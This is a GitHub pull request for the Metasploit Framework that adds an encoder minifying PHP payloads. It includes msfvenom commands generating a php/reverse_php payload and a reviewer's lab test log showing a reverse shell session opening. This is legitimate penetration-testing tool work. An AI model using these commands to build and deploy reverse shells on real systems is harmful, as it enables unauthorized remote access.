-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add an encoder to minify php payloads #19435
Conversation
jvoisin
commented
Sep 1, 2024
```console $ ./msfvenom --platform php -a php -p php/reverse_php | ./msfvenom -e php/base64 --platform php -a php | php -l Attempting to read payload from STDIN... No encoder specified, outputting raw payload Payload size: 3010 bytes Found 1 compatible encoders Attempting to encode payload with 1 iterations of php/base64 php/base64 succeeded with size 4052 (iteration=0) php/base64 chosen with final size 4052 Payload size: 4052 bytes No syntax errors detected in Standard input code $ ./msfvenom --platform php -a php -p php/reverse_php -e php/minify | ./msfvenom -e php/base64 --platform php -a php | php -l Attempting to read payload from STDIN... Found 1 compatible encoders Attempting to encode payload with 1 iterations of php/minify php/minify succeeded with size 2109 (iteration=0) php/minify chosen with final size 2109 Payload size: 2109 bytes Found 1 compatible encoders Attempting to encode payload with 1 iterations of php/base64 php/base64 succeeded with size 2839 (iteration=0) php/base64 chosen with final size 2839 Payload size: 2839 bytes No syntax errors detected in Standard input code $ ```
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the great addition @jvoisin, makes sense, looks good and works without issue!
Testing
Before:
➜ metasploit-framework git:(upstream-master) ✗ bundle exec ./msfvenom --platform php -a php -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 | bundle exec ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
No encoder specified, outputting raw payload
Payload size: 2993 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4029 (iteration=0)
php/base64 chosen with final size 4029
Payload size: 4029 bytes
No syntax errors detected in Standard input code
After / with new encoder:
➜ metasploit-framework git:(5b94c7e2d4) ✗ bundle exec ./msfvenom --platform php -a php -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 -e php/minify | bundle exec ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/minify
php/minify succeeded with size 2078 (iteration=0)
php/minify chosen with final size 2078
Payload size: 2078 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 2798 (iteration=0)
php/base64 chosen with final size 2798
Payload size: 2798 bytes
No syntax errors detected in Standard input code
Ensuring the payload generated with the new encoder works:
msf6 payload(php/reverse_php) > to_handler
[*] Payload Handler Started as Job 1
[*] Started reverse TCP handler on 172.16.199.1:4444
msf6 payload(php/reverse_php) > [*] Command shell session 16 opened (172.16.199.1:4444 -> 172.16.199.1:55241) at 2024-09-04 14:27:53 -0700
msf6 payload(php/reverse_php) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
16 shell php/php 172.16.199.1:4444 -> 172.16.199.1:55241 (172.16.199.1)
msf6 payload(php/reverse_php) > sessions -i -1
[*] Starting interaction with 16...
id
uid=1000(msfuser) <redacted>
Release NotesThis encoder minifies PHP payloads by removing spaces after keywords and before block openings. It removes comments, empty lines, new lines and leading and trailing spaces |